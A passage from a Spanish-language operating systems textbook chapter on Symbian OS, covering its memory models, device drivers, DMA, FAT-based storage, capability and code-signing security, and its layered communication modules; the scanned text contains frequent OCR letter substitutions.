tiempo de acceso a las tablas y el almacenamiento. 


memoria se asignan a las páginas desde una lista de marcos libres: si no hay marcos libres disponi¬ 
bles, entonces se genera una condición de error. Los marcos de memoria utilizados no se pueden 
reemplazar con páginas de una aplicación entrante, incluso si los marcos son para una aplicación 
que no se esté ejecutando en ese momento. Esto se debe a que no hay intercambio en Symbian OS 
y no hay lugar en donde se puedan copiar las páginas desalojadas, ya que la memoria flash (muy li¬ 
mitada) es sólo para los archivos de usuario. 

En realidad hay cuatro versiones distintas del modelo de implementación de memoria que uti¬ 
liza Symbian OS. Cada modelo se diseñó para ciertos tipos de configuración de hardware. A conti¬ 
nuación se muestra un breve listado: 

El modelo de movimiento Este modelo se diseñó para las primeras arquitecturas del 
ARM . El directorio de páginas en el modelo de movimiento es de 4 KB de largo, y cada 
entrada contiene 4 bytes, para un tamaño del directorio de 16 KB. Las páginas de memo¬ 
ria se protegen mediante bits de acceso asociados con los marcos de memoria y mediante 
el etiquetado del acceso a la memoria con un dominio. Los dominios se registran en el di¬ 
rectorio de páginas y la M M U implementa los permisos de acceso para cada dominio. 
Aunque no se utiliza la segmentación en forma explícita, hay una organización para la dis- 
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tribución de la memoria: hay una sección de datos para ios datos asignados por ei usuario 
y una sección de kernei para ios datos asignados por ei kernei. 

El modelo múltiple Este modeio se desarroiió para i as versiones 6 y posteriores de i a ar¬ 
quitectura dei ARM . La M M U en estas versiones difiere de ia utiiizada en versiones ante¬ 
riores. Por ejempio, ei directorio de página requiere un manejo distinto, ya que se puede 
seccionar en dos piezas, cada una de ias cuaies hace referencia a dos conjuntos distintos 
de tabias de páginas. Estos dos conjuntos se utiiizan para ias tabias de páginas de usuario 
y ias tabias de página de kernei. La nueva versión de i a arquitectura A RM revisó y mejo¬ 
ró ios bits de acceso en cada marco de página, y abandonó ei concepto principai. 

El modelo directo Ei modeio directo de memoria asume que no hay M M U. Este modeio 
se utiiiza muy poco y no está permitido en ios teiáfonos inteiigentes. La faita de una M M U 
ocasionaría severos probiemas de rendimiento. Este modeio es útii para ios entornos de de- 
sarroiio en ios que ia M M U se debe deshabiiitar por aiguna razón. 

El modelo del emulador Este modeio se desarroiió para proveer un emuiador deSymbian 
OS para Windows. Ei emuiador tiene unas cuantas restricciones en comparación con una 
verdaderaCPU de destino. Ei emuiador se ejecuta como un soio proceso deWindows, por 
io queei espacio de direcciones está restringido a2GB ynoa4GB.Todaia memoria que 
se proporciona ai emuiador es accesibie para cuaiquier proceso de Symbian OS, y por io 
tanto no hay protección de memoria disponibie. Las bibiiotecas de Symbian OS se propor¬ 
cionan como DLLs con formato deWindows, y por io tanto Windows es quien maneja ia 
asignación y ia administración de ia memoria. 


12.5 ENTRADA Y SALIDA 

La estructura de entrada/sai ida de Symbian OS refieja ia de otros diseños de sistemas operativos. 
En esta sección resaitaremos aigunas de ias características únicas que Symbian OS utiiiza para en¬ 
focarse en su piataforma de destino. 

12.5.1 Drivers de dispositivos 

En Symbian OS, ios drivers de dispositivos se ejecutan como código priviiegiado dei kernei para 
proporcionar acceso ai código de nivei de usuario a ios recursos protegidos dei sistema. Ai iguai 
que en ios casos de Linux y Windows, ios drivers de dispositivos representan ei acceso ai hardwa¬ 
re mediante ei software. 

En Symbian OS, un driver de dispositivos se divide en dos niveies: un driver de dispositivo ió- 
gico (LDD) y un driver de dispositivo físico (FDD). Ei LDD presenta una interfaz a ios niveies su¬ 
periores dei software, mientras que ei FDD interactúa de manera directa con ei hardware. En este 
modeio, ei LDD puede utiiizar ia misma impiementación para una ciase específica de dispositivos, 
mientras queei FDD cambia con cada dispositivo. Symbian OS suministra muchos LDDs estándar. 
Aigunas veces, si ei hardware es muy estándar o común, Symbian OS también proporciona un FDD. 
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Considere un ejemplo de un dispositivo serial. Symbian OS define un LDD serial genérico que 
define las interfaces del programa para acceder al dispositivo serial. El LDD proporciona una inter¬ 
faz para el PDD, el cual proporciona la interfaz para los dispositivos seriales. El PDD implementa 
los mecanismos de búfer y de control de flujo necesarios para ayudar a regular las diferencias de ve¬ 
locidad entre la CPU y los dispositivos seriales. Un solo LDD (del lado del usuario) se puede conec¬ 
tar con cualquiera de los PDDs que se pudieran utilizar para operar dispositivos seriales. En un 
teléfono inteligente específico, éstos podrían incluir un puerto infrarrojo o incluso un puerto RS-232. 
Estos dos son buenos ejemplos: utilizan el mismo LDD serial, pero distintos PDDs. 

Los LDDs y los PDDs se pueden cargar en forma dinámica mediante los programas de usua¬ 
rio, si no existen ya en la memoria. Se proporcionan herramientas de programación para compro¬ 
bar si es necesario cargarlos. 

12.5.2 Extensionesdel kernel 

Las extensiones del kernel son drivers de dispositivos que Symbian OS carga en tiempo de inicio. 
Como se cargan en tiempo de inicio, son casos especiales que se necesitan tratar de manera distin¬ 
ta a los drivers de dispositivos normales. 

Las extensiones del kernel son distintas de los drivers de dispositivos normales. La mayoría de 
estos drivers de dispositivos se implementan como LDDs y forman parejas con los PDDs; además 
se cargan cuando es necesario mediante las aplicaciones en espacio de usuario. Las extensiones del 
kernel se cargan en tiempo de inicio y están orientadas de manera específica a ciertos dispositivos: 
por lo general no forman pares con PDDs. 

Las extensiones del kernel están integradas en el procedimiento de inicio. Estos drivers de dis¬ 
positivos especiales se cargan e inician justo después de que inicia el programador. Implementan 
funciones cruciales para los sistemas operativos: servicios de DMA, administración de la pantalla, 
control de buses para los dispositivos periféricos (por ejemplo, el bus USB). Estos drivers se pro¬ 
porcionan por dos razones. En primer lugar, coinciden con las abstracciones de diseño orientado a 
objetos que hemos visto como característica del diseño de microkernels. En segundo lugar, permi¬ 
te que las plataformas separadas en las que se ejecuta Symbian OS ejecuten drivers de dispositivos 
especializados, los cuales habilitan el hardware para cada plataforma sin tener que volver a compi¬ 
lar el kernel. 

12.5.3 Acceso directo a la memoria 

Con frecuencia, los drivers de dispositivos hacen uso de DMA, por lo que Symbian OS acepta el 
uso de hardware de DMA. Este hardware consiste en un controlador de un conjunto de canales de 
DMA. Cada canal proporciona una sola dirección de comunicación entre la memoria y un disposi¬ 
tivo: porlotanto, la transmisión bidireccional de los datos requiere dos canales deDMA. Hay por 
lo menos un par de canales de DM A dedicados al controlador LCD de la pantalla. Además, la ma¬ 
yoría de las plataformas ofrecen cierto número de canales de DMA generales. 

Cuando un dispositivo transmite datos a la memoria, se activa una interrupción del sistema. El 
PDD utiliza el servicio de DMA que proporciona el hardware de DM A para el dispositivo transmi- 
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sor: la parte del dispositivo que se interconecta con ei hardware. Symbian OS impiementa dos ni- 
veies de software entre ei FDD y ei controiador de DM A: un nivei de DMA de software y una ex¬ 
tensión dei kernei que se interconecta con ei hardware de DM A. Ei mismo nivei de DMA se divide 
en un nivei independiente de ia piataforma y en uno dependiente. Como extensión dei kernei, ei ni¬ 
vei de DM A es uno de ios primeros drivers de dispositivos que ei kernei inicia durante ei procedi¬ 
miento de inicio. 

Ei soporte para ei DM A es compiicado debido a una razón especiai. Symbian OS soporta mu¬ 
chas configuraciones de hardware distintas, por io cuai se puede suponer una soia configuración de 
DM A. La interfaz para ei hardware de DM A se estandariza entre una piataforma y otra, y se sumi¬ 
nistra en ei nivei independiente de ia piataforma. Ei fabricante proporciona ei nivei dependiente de 
ia piataforma y ia extensión dei kernei, con io cuai trata ai hardware de DMA de ia misma forma 
en que Symbian OS trata a cuaiquier otro dispositivo: con un driver de dispositivos en ios compo¬ 
nentes LDD y FDD. Como ei hardware de DM A se ve como un dispositivo en su propio derecho, 
esta forma de impiementar ei soporte tiene sentido, debido a que es paraieia a ia forma en que Sym¬ 
bian OS admite todos ios dispositivos. 

12.5.4 Caso especial: medios de almacenamiento 

Los drivers de ios medios son una forma especiai de FDD en Symbian OS, que ei servidor de ar¬ 
chivos utiiiza de manera exciusiva para impiementar ei acceso a ios dispositivos de ios medios de 
aimacenamiento. Como ios teiáfonos inteiigentes pueden contener medios fijos y removibies, ios 
drivers de medios deben reconocer y soportar una variedad de formas de aimacenamiento. Ei so¬ 
porte de Symbian OS para ios medios inciuye un LDD estándar y una AFI de interfaz para ios 
usuarios. 

Ei servidor de archivos en Symbian OS puede aceptar hasta 26 unidades distintas ai mismo 
tiempo. Las unidades iocaies se distinguen mediante su ietra de unidad, como en Windows. 


12.5.5 Bloqueo de E/S 

Symbian OS trata con ei bioqueo de E/S por medio de objetos activos. Los diseñadores se dieron 
cuenta que ei peso de todos ios hiios que esperan un evento de E/S afecta a ios demás hiios en ei 
sistema. Los objetos activos permiten que ei sistema operativo maneje ias iiamadas de bioqueo de 
E/S, en vez de que io haga ei mismo proceso. Los objetos activos se coordinan mediante un soio 
pianificador y se impiementan en un soio hiio. 

Cuando ei objeto activo utiiiza una iiamada de bioqueo de E/S, io señaia ai sistema operativo 
y se suspende a sí mismo. Cuando se compieta ia iiamada de bioqueo, ei sistema operativo des¬ 
pierta ai proceso suspendido y éste continúa su ejecución como si una función hubiera regresado 
con datos. La diferencia es una de perspectiva para ei objeto activo. No puede iiamar a una fun¬ 
ción y esperar un vaior de retorno. Debe iiamar a una función especiai y dejar que eiia estabiezca 
ia E/S de bioqueo, pero debe regresar de inmediato. Ei sistema operativo se hace cargo de ia 
espera. 
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12.5.6 M ed i os removibles 

Los medios removibles representan un dilema interesante para los diseñadores de sistemas operativos. 
Cuando se inserta una tarjeta SD (Digital segura) en la ranura del lector, es un dispositivo justo igual 
que los demás. Necesita un controlador, un driver, una estructura de bus y tal vez se comunique con la 
CPU por medio de DMA. Sin embargo, el hecho de quitar este medio es un problema grave para este 
modelo de dispositivo: ¿cómo detecta el sistema operativo la inserción y remoción, y cómo debe tener 
en cuenta el modelo la ausencia de una tarjeta de medios? Para complicar más las cosas, algunas ranu¬ 
ras de dispositivos pueden alojar más de un tipo de dispositivo. Por ejemplo, una tarjeta SD, una tarje¬ 
ta miniSD (con un adaptador) y una tarjeta M ultimediaCard utilizan el mismo tipo de ranura. 

Symbian OS empieza su implementación de los medios removibles con sus similitudes. Cada 
tipo de medio removible tiene características comunes para todos los demás: 

1. Todos los dispositivos se pueden insertar y remover. 

2. Todos los medios removibles se pueden remover "en caliente": es decir, mientras están en 
uso. 

3. Cada medio puede reportar sus capacidades. 

4. Las tarjetas incompatibles se deben rechazar. 

5. Cada tarjeta necesita energía. 

Para aceptar medios removibles, Symbian OS proporciona controladores de software que con¬ 
trolan cada tarjeta admitida. Los controladores funcionan con los drivers de dispositivos para cada 
tarjeta, también en software. Cuando se inserta una tarjeta se crea un objeto de socket, que forma el 
canal a través del cual fluyen los datos. Para adaptar los cambios en el estado de la tarjeta, Symbian 
OS proporciona una serie de eventos que ocurren cuando los estados cambian. Los drivers de dis¬ 
positivos se configuran como objetos activos para escuchar y responder a estos eventos. 


12.6 SISTEMAS DE ALMACENAMIENTO 

AI igual que todos los sistemas operativos orientados al usuario, Symbian OS tiene un sistema de 
archivos, el cual veremos a continuación. 

12.6.1 Sistemas de archivos para dispositivos móviles 

En términos de sistemas de archivos y almacenamiento, los sistemas operativos de los teléfonos 
móviles tienen muchos de los requerimientos de los sistemas operativos de los equipos de escrito¬ 
rio. La mayoría se impiementa en entornos de 32 bits; permite a los usuarios dar nombres arbitra¬ 
rios a los archivos: almacena muchos archivos que requieren cierto tipo de estructura organizada. 
Esto significa que es conveniente un sistema de archivos jerárquico basado en directorios. Y aun- 
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que los diseñadores de los sistemas operativos móviles tienen muchas opciones para los sistemas 
de archivos, hay una característica más que influye en su elección: la mayoría de los teléfonos mó¬ 
viles tienen medios de almacenamiento que se pueden compartir con un entorno Windows. 

Si los sistemas de los teléfonos móviles no tuvieran medios removibles, entonces se podría utili¬ 
zar cualquier sistema de archivos. Sin embargo, para los sistemas que utilizan memoria flash hay que 
tener en cuenta ciertas circunstancias. Los tamaños de bloque son por lo general de 512 bytes a 2048 
bytes. La memoria flash simplemente no puede sobrescribir la memoria: debe borrar primero y luego 
escribir. Además, la unidad de eliminación es bastante ordinaria: no es posible borrar bytes, sino blo¬ 
ques enteros a la vez. Los tiempos de borrado para la memoria flash son relativamente largos. 

Para tener en cuenta estas características, la memoria flash funciona mejor cuando hay sistemas 
de archivos diseñados de manera específica que esparcen las escrituras por los medios y lidian con 
los tiempos largos de borrado. El concepto básico es que cuando se va a actualizar el almacenamien¬ 
to flash, el sistema de archivos escribe una nueva copia de los datos modificados en un bloque sin 
usar, reasigna los apuntadores de archivos y borra el bloque anterior más tarde, cuando tiene tiempo. 

Uno de los primeros sistemas de archivos flash fue FFS2 de M icrosoft, para usarlo con M S- 
DOS, a principios de la década de 1990. Cuando el grupo de la industria PCM CIA aprobó la espe¬ 
cificación del Nivel de traducción de flash para la memoria flash en 1994, los dispositivos flash 
tenían la apariencia de un sistema de archivos FAT. Linux también cuenta con sistemas de archivos 
diseñados en forma especial, desdeJFFS a YAFFS (j ournaling Flash File System, Sistema de ar¬ 
chivos flash transaccional, y Yet Another F lash Filing System, Otro sistema más de archivos flash ). 

Sin embargo, las plataformas móviles deben compartir sus medios con otras computadoras, pa¬ 
ra lo cual es necesario contar con cierta forma de compatibilidad. Los sistemas FAT se utilizan con 
más frecuencia. En especial FAT-16 por su tabla de asignación más corta (en vez de FAT-32) y por 
su uso reducido de archivos extensos. 

12.6.2 Sistemas de archivos de Symbian O S 

Debido a que Symbian OS es un sistema operativo para teléfonos inteligentes móviles, necesita im- 
plementar por lo menos el sistema de archivos FAT-16. Sin duda provee soporte para FAT-16 y uti¬ 
liza ese sistema operativo para la mayor parte de sus medios de almacenamiento. 

Sin embargo, la implementación del servidor de archivos de Symbian OS se basa en una abs¬ 
tracción, en forma muy parecida al sistema de archivos virtual de Linux. La orientación a objetos 
permite conectar objetos que implementan varios sistemas operativos al servidor de archivos de 
Symbian OS, con lo cual se pueden utilizar muchas implementaciones distintas de sistemas de ar¬ 
chivos. Incluso, las distintas implementaciones pueden coexistir en el mismo servidor de archivos. 

También se han creado implementaciones de los sistemas de archivos NFS y SM B para Sym¬ 
bian OS. 

12.6.3 Seguridad y protección del sistema de archivos 

La seguridad de los teléfonos inteligentes es una interesante variación en la seguridad computado- 
nal en general. Hay varios aspectos de los teléfonos inteligentes que convierten la seguridad en 
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algo así como un reto. Symbian OS ha realizado varias elecciones de diseño que lo diferencian de 
los sistemas de escritorio de propósito general y de otras plataformas de teléfonos inteligentes. En 
esta sección nos concentraremos en los aspectos que pertenecen a la seguridad del sistema de archi¬ 
vos: en la siguiente trataremos las otras cuestiones. 

Considere el entorno para los teléfonos inteligentes. Son dispositivos de un solo usuario y no 
requieren identificación para usarlos. El usuario de un teléfono puede ejecutar aplicaciones, marcar 
un número telefónico y acceder a las redes; todo ello sin identificación. En este entorno, el uso de 
la seguridad basada en permisos es desafiante debido a que la falta de identificación significa que 
sólo es posible un conjunto de permisos: el mismo para todos. 

En vez de permisos de usuario, la seguridad con frecuencia aprovecha otros tipos de informa¬ 
ción. En la versión 9 y posteriores de Symbian OS, las aplicaciones reciben un conjunto de capaci¬ 
dades al instalarse (en la siguiente sección analizaremos el proceso que decide qué capacidades 
otorgar a una aplicación). Este conjunto de capacidades para una aplicación se compara con el ac¬ 
ceso que solicita. Si el acceso está en el conjunto de capacidades, entonces se otorga el acceso: en 
caso contrario, se rechaza. Para comparar capacidades se requiere cierta sobrecarga (la comparación 
se realiza en cada llamada al sistema que implique el acceso a un recurso), pero ya no existe la so¬ 
brecarga de comparar la propiedad de los archivos con el propietario de un archivo. Este sacrificio 
funciona bien para Symbian OS. 

En Symbian OS hay algunas otras formas de seguridad para los archivos. Hay áreas del me¬ 
dio de almacenamiento de Symbian OS que las aplicaciones no pueden utilizar sin una capacidad 
especial, la cual se proporciona sólo a la aplicación que instala software en el sistema. El efecto 
de esto es que después de instalar las nuevas aplicaciones quedan protegidas contra el acceso que 
no sea del sistema (lo cual significa que los programas maliciosos que no sean del sistema, como 
los virus, no pueden infectar a las aplicaciones instaladas). Además, hay áreas del sistema de ar¬ 
chivos reservadas de manera específica para ciertos tipos de manipulación de datos por parte de 
una aplicación (a esto se le conoce como jaulas de datos; consulte la siguiente sección). 

Para Symbian OS, el uso de capacidades ha funcionado bien, así como la propiedad de los ar¬ 
chivos para proteger el acceso a los mismos. 


2.7 LA SEGURIDAD EN SYMBIAN OS 

Los teléfonos inteligentes proveen un entorno que es difícil hacer seguro. Como vimos antes, son 
dispositivos de un solo usuario y no requieren la autenticación del mismo para usar las funciones 
básicas. Incluso las funciones más complicadas (como instalar aplicaciones) requieren autorización, 
más no autenticación. Sin embargo, se ejecutan en sistemas operativos complejos con muchas formas 
de enviar y recibir datos (incluyendo la ejecución de programas). Es complicado salvaguardar es¬ 
tos entornos. 

Symbian OS es un buen ejemplo de esta dificultad. Los usuarios esperan que los teléfonos in¬ 
teligentes con Symbian OS permitan cualquier tipo de uso sin necesidad de autenticación (sin ne¬ 
cesidad de iniciar sesión ni de verificar su identidad). Aun así, como sin duda habrá experimentado 
el lector, un sistema operativo tan complicado como Symbian OS es muy capaz, pero también es 
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susceptible a los virus, gusanos y demás programas maliciosos. Las versiones de Symbian OS 
anteriores a la versión 9 ofrecían una seguridad tipo guardián: el sistema pedía al usuario permiso 
para instalar cada una de las aplicaciones. El pensamiento en este diseño era que sólo las aplicacio¬ 
nes instaladas por el usuario podrían causar daños en el sistema, y un usuario informado sabría qué 
programas podía instalar y cuáles podrían ser maliciosos. Se confiaba en el usuario que los usara 
con prudencia. 

Este diseño de guardián tiene mucho mérito. Por ejemplo, un nuevo teléfono inteligente sin 
aplicaciones instaladas por el usuario sería un sistema que podría ejecutarse sin errores. Al instalar 
sólo aplicaciones que el usuario sabía que no eran maliciosas, se podría mantener la seguridad del 
sistema. El problema con este diseño es que los usuarios no siempre conocen las ramificaciones 
completas del software que van a instalar. Hay virus que se enmascaran como programas útiles y 
realizan funciones de utilidad mientras instalan en silencio código malicioso. Los usuarios norma¬ 
les no pueden verificar la confianza completa de todo el software disponible. 

Esta verificación de la confianza es lo que provocó un rediseño completo de la seguridad de 
plataforma para la versión 9 de Symbian OS. Esta versión del sistema operativo mantiene el mo¬ 
delo del guardián, pero asume la responsabilidad de verificar el software en vez de que lo haga 
el usuario. Ahora cada desarrollador de software es responsable de verificar sus propias aplica¬ 
ciones por medio de un proceso conocido como firmado, y el sistema verifica la afirmación del 
desarrollador. No todo el software requiere esta verificación, sino sólo el que accede a ciertas fun¬ 
ciones del sistema. Cuando una aplicación requiere firmado, éste se lleva a cabo a través de una 
serie de pasos: 

1. El desarrollador de software debe obtener un ID de distribuidor de un tercero en quien 
se confía. Estos terceros de confianza están certificados por Symbian. 

2. Cuando un desarrollador produce un paquete de softwarey desea distribuirlo, debe en¬ 
viarlo a un tercero para que lo valide. El desarrollador envía su ID de distribuidor, el 
software y una lista de formas en que el software accede al sistema. 

3. Después, el tercero de confianza verifica que la lista de ti pos de acceso del software es¬ 
té completa y que no ocurra ningún otro tipo de acceso. Si el tercero puede realizar es¬ 
ta verificación, entonces firma ese software. Esto significa que el paquete de instalación 
tiene una cantidad especial de información que explica con detalle lo que hará en un 
sistema Symbian OS, y qué puede llegar a hacer. 

4. Este paquete de instalación se envía devuelta al desarrollador de software, para que lo 
distribuya a los usuarios. Observe que este método depende de la forma en que el soft¬ 
ware accede a los recursos del sistema. Symbian OS dice que para poder acceder a un 
recurso del sistema, un programa debe tener la capacidad de acceder a ese recurso. Es¬ 
ta idea de las capacidades está integrada en el kernel de Symbian OS. Cuando se crea 
un proceso, parte de su bloque de control registra las capacidades que se le otorgan. En 
caso de que el proceso trate de realizar un acceso que no se liste en estas capacidades, 
el kernel le denegará ese acceso. 
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El resultado de este proceso aparentemente elaborado para distribuir apiicaciones firmadas es 
un sistema de confianza, en ei cuai un guardián automatizado integrado en Symbian OS puede ve¬ 
rificar ei software que se va a instaiar. Ei proceso de instaiación comprueba ia señaiización dei pa¬ 
quete de instaiación. Si ia firma dei paquete es váiida, ei kernei otorga ias capacidades a ia 
apiicación cuando se ejecuta. 

Ei diagrama de ia figura 12-3 describe ias reiaciones de confianza en Symbian OS versión 9. 
Aquí podemos observar que hay varios niveies de confianza integrados en ei sistema. Hay ciertas 
apiicaciones que no acceden para nada a ios recursos dei sistema, y por io tanto no requieren firma. 
Un ejempio de esto podría ser una apiicación simpiequesóio muestre aigo en ia pantaiia. Estas apii¬ 
caciones no son de confianza, pero no necesitan serio. Ei siguiente nivei está compuesto por 
ias apiicaciones firmadas de nivei de usuario. Estas apiicaciones firmadas sóio reciben ias capaci¬ 
dades que necesitan. Ei tercer nivei de confianza está compuesto por ios servidores dei sistema. Ai 
iguai que ias apiicaciones a nivei de usuario, estos servidores tai vez sóio necesiten ciertas capaci¬ 
dades para reaiizar sus iabores. En una arquitectura de microkernei como Symbian OS, estos servi¬ 
dores se ejecutan a nivei de usuario y son de confianza, como ias apiicaciones de nivei de usuario. 
Por úitimo, hay una ciase de programas que requieren una confianza compieta dei sistema. Este 
conjunto de programas tiene ia habiiidad totai de modificar ei sistema, y está compuesto por códi¬ 
go dei kernei. 


Entorno de computación de confianza: 

Los servidores del sistema se 
ejecutan con distintos privilegios 


Base de cómputo de confianza: 

La habilidad completa de modificar el 
sistema; contiene el kernei, F32, SWInstall 



Figura 12-3. Symbian OS utiliza las relaciones de confianza para implementar 
la seguridad. 


Hay varios aspectos de este sistema que podrían parecer cuestionabies. Por ejempio, ¿es nece¬ 
sario este proceso eiaborado (en especiai cuando se requiere dinero para hacerio)? La respuesta es 
sí: ei sistema de firmas de Symbian OS reempiaza a ios usuarios como ei verificador de ia integri- 
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dad del software, y debe realizarse una verificación real. Por ende, podría parecer que los procesos 
dificultan el desarrollo: ¿cada prueba en el hardware real requiere un nuevo paquete de instalación 
firmado? Para responder a esto, Symbian OS reconoce un firmado especial para los desarrollado¬ 
res. Un desarrollador debe obtener un certificado digital firmado especial, que tiene un límite de 
tiempo (por lo general de 6 meses) y es específico para un teléfono digital particular. Así, el desa¬ 
rrollador puede crear sus propios paquetes de instalación con el certificado digital. 

A demás de esta función de guardián en la versión 9, Symbian OS emplea algo conocido como 
jaulas de datos, donde los datos se organizan en ciertos directorios. El código ejecutable existe só¬ 
lo en un directorio (por ejemplo) en el que sólo la aplicación de instalación de software puede es¬ 
cribir. Además, los datos escritos por las aplicaciones se pueden escribir sólo en un directorio, el 
cual es privado e inaccesible para los otros programas. 


12.8LA COMUNICACIÓN EN SYMBIAN OS 

Symbian OS está diseñado con criterios específicos en mente y se puede caracterizar por las comu¬ 
nicaciones controladas por eventos, mediante el uso de relaciones cliente/servidor y las configura¬ 
ciones basadas en una pila. 


12.8.1 Infraestructura básica 

La infraestructura de comunicación de Symbian OS se basa en componentes básicos. La figura 
12-4 muestra una forma muy genérica de esta infraestructura. Considere este diagrama como pun¬ 
to inicial para un modelo organizacional. En la parte inferior de la pila hay un dispositivo físico co¬ 
nectado en cierta forma a la computadora. Este dispositivo podría ser un módem de teléfono móvil 
o un transmisor de radio Bluetooth embebido (incrustado) en un comunicador. Aquí no estamos in¬ 
teresados en los detalles del hardware, por lo que consideraremos este dispositivo físico como una 
unidad abstracta que responde a los comandos del software en la forma apropiada. 

El siguiente nivel, el primero que nos interesa, es el del driverdedispositivo. Ya hemos recal¬ 
cado la estructura de los drivers de dispositivos: el software en este nivel se preocupa por trabajar 
de manera directa con el hardware a través de las estructuras LDD y FDD. El software en este ni¬ 
vel es específico para el hardware, y cada nueva pieza de hardware requiere un nuevo driver de dis¬ 
positivo como interfaz. Se requieren distintos drivers para las diiferentes unidades de hardware, pero 
todas deben implementar la misma interfaz para los niveles superiores. El nivel de implementación 
de protocolos esperará la misma interfaz, sin importar qué hardware se utilice. 

El siguiente nivel es el de implementación de protocolos, el cual contiene las implementacio- 
nesde los protocolos que admite Symbian OS. Estas implementadones asumen una interfaz de dri¬ 
ver de dispositivo con el nivel inferior y proveen una sola interfaz unificada para el nivel de 
aplicación superior. Por ejemplo, éste es el nivel que implemento las suites de protocolos Bluetooth 
y TC P/l P, además de otros protocolos. 
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Figura 12-4. La comunicación en Symbian OS tiene una estructura orientada a bioques. 


Por último, el nivel de aplicación es el más superior. Este nivel contiene la aplicación que de¬ 
be utilizar la infraestructura de comunicación. La aplicación no sabe mucho sobre la forma en que 
se implementan las comunicaciones. Sin embargo, realiza el trabajo necesario para informar al sis¬ 
tema operativo sobre los dispositivos que utilizará. U na vez que los drivers están instalados, la apli¬ 
cación no los utiliza en forma directa, sino que se basa en lasAPIs del nivel de implementación de 
protocolos para controlar los verdaderos dispositivos. 

12.8.2 Un análisis más detallado de la infraestructura 

En la figura 12-5 se muestra un análisis más detallado de los niveles en esta infraestructura de co¬ 
municación de Symbian OS. Este diagrama se basa en el modelo genérico de la figura 12-4, cuyos 
bloques se subdividieron en unidades operacionales que representan a los que utiliza Symbian OS. 

EI dispositivo físico 

Primero hay que tener en cuenta que el dispositivo no se ha cambiado. Como dijimos antes, Sym¬ 
bian OS no tiene control sobre el hardware. Por lo tanto, aloja el hardware a través de este diseño 
de laAPI en niveles, pero no especifica cómo se diseña y construye el hardware en sí. En realidad 
esto es una ventaja para Symbian OS y sus desarrolladores. Al ver el hardware como una unidad 
abstracta y diseñar la comunicación alrededor de esta abstracción, los diseñadores de Symbian OS 
aseguran que dicho sistema operativo pueda manejar la amplia variedad de dispositivos disponibles 
en la actualidad, y que también pueda alojar el hardware del futuro. 
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Figura 12-5. La estructura de comunicación en Symbian OS tiene un conjunto exten¬ 
so de características. 


L a capa de driver de dispositivo 

Esta capa se ha dividido en dos niveles en la figura 12-5. El nivel PDD se interconecta de manera 
directa con el dispositivo físico (como vimos antes) a través de un puerto de hardware específico. 
El nivel LDD se interconecta con el nivel de implementacion de protocolos e implementa las direc¬ 
tivas de Symbian OS relacionadas con el dispositivo. Estas directivas incluyen el uso de búferes de 
entrada y salida, los mecanismos de interrupciones y el control del flujo. 

La capa de implementación de protocolos 

En la figura 12-5 se han agregado varias subcapas al nivel de implementación de protocolos. Se uti¬ 
lizan cuatro tipos de módulos para la implementación de protocolos: 

Módulos CSY El nivel más bajo en las capas de implementación de protocolos es el ser¬ 
vidor de comunicación, o módulo CSY. Dicho módulo se comunica de manera directa con 
el hardware a través de la porción del driver de dispositivo correspondiente al PDD,eim- 
plementa los diversos aspectos de bajo nivel de los protocolos. Por ejemplo, tal vez un pro¬ 
tocolo requiera una transferencia de datos puros al dispositivo de hardware, o especifique 
una transferencia de búfer de 7 u 8 bits. El módulo CSY maneja estos modos. 
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MódulosTSY La telefonía abarca una gran parte de la infraestructura de comunicaciones, 
y se utiiizan móduios especiaies para impiementaria. Los móduios dei servidor de teiefo- 
nía (TSY) impiementan ia funcionaiidad de teiefonía. Los TSY s básicos pueden soportar 
funciones teiefónicas estándar (por ejempio, hacer y terminar i i amadas) en una ampiia va¬ 
riedad de hardware. Los TSY s más avanzados pueden soportar hardware teiefónico avan¬ 
zado, como ios que soportan ia funcionaiidad GSM . 

Módulos PRT Los móduios centraies que se utiiizan para impiementar protocoios son ios 
móduios de protocoios, o móduios PRT. Los servidores utiiizan dichos móduios para im¬ 
piementar protocoios. Un servidor crea una instancia de un móduio PRT cuando intenta 
usar ese protocoio. Por ejempio, ia suiteTCP/IP de protocoios se impiementa mediante ei 
móduio TCPIP.PRT. Los protocoios de Biuetooth se impiementan mediante ei móduio 
BT.PRT. 

MTMsComo Symbian OS está diseñado de manera específica para ia mensajería, ios ar¬ 
quitectos construyeron un mecanismo para manejar mensajes de todo tipo. Estos maneja- 
dores de mensajes se conocen como móduios de tipos de mensajes, o MTMs. Ei manejo 
de mensajes tiene muchos aspectos distintos, y ios MTM s deben impiementar cada uno de 
estos aspectos. Los M TM s de interfaz de usuario deben impiementar ias diversas formas 
en que ios usuarios verán y manipuiarán mensajes, desde ia forma en que un usuario iee 
un mensaje, hasta ia manera en que se ie notifica sobre ei progreso dei envío de un men¬ 
saje. Los MTMs dei iado ciiente manejan ios procesos de dirigir, crear y responder a ios 
mensajes. Los MTMs dei iado servidor deben impiementar ia manipuiación orientada a 
objetos de ios mensajes, inciuyendo ia manipuiación de carpetas y ia manipuiación espe¬ 
cífica para ios mensajes. 

Estos móduios se basan en cada uno de ios otros móduios de varias formas, dependiendo dei 
tipo de comunicación que se utiiice. Por ejempio, ias impiementaciones de ios protocoios que uti¬ 
iizan Biuetooth sóio utiiizan móduios PRT encima de ios drivers de dispositivo. Ciertos protocoios 
IrDA hacen esto también. Las impiementaciones de TCP/IP que utilizan PPP se basan en los módu¬ 
los PRT, además de un módulo TSY y un módulo CSY. Las impiementaciones deTCP/IP sin PPP 
por lo general no utilizan un módulo TSY o un módulo CSY, pero sí vinculan un módulo PRT a un 
driver de dispositivo de red. 

M odularidad de la infraestructura 

La modularidad de este modelo basado en pilas es útil para los implementadores. La calidad abs¬ 
tracta del diseño en niveles debe ser evidente a través de los ejemplos que acabamos de mostrar. 
Considere la implementación de la pila TCP/IP. Una conexión PPP puede ir di rectamente a un mó¬ 
dulo CSY, elegir una implementación GSM o TSY de módem regular, que a su vez pasa por un 
módulo CSY. Cuando el futuro traiga una nueva tecnología de telefonía, la estructura existente se¬ 
guirá en funcionamiento y se requerirá sólo agregar un módulo TSY para la implementación de la 
nueva telefonía. Además, para ajustar con detalle la pila del protocolo TCP/IP no se requiere alterar 
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ninguno de los módulos de los que depende: simplemente se ajusta el módulo PRT deTCP/IP y se 
deja el resto igual. Esta modularidad extensiva significa que el nuevo código se adhiere con facili¬ 
dad a la infraestructura, el código antiguo se descarta con facilidad y el código existente se puede 
modificar sin tener que trastornar todo el sistema o requerir reinstalaciones extensivas. 

Por último, en la figura 12-5 se han agregado subcapas al nivel de aplicación. Hay módulos 
CSY que las aplicaciones utilizan como interfaces para los módulos de protocolos en sus implemen- 
taciones. A unque podemos considerar estos módulos como partes de las implementaciones de pro¬ 
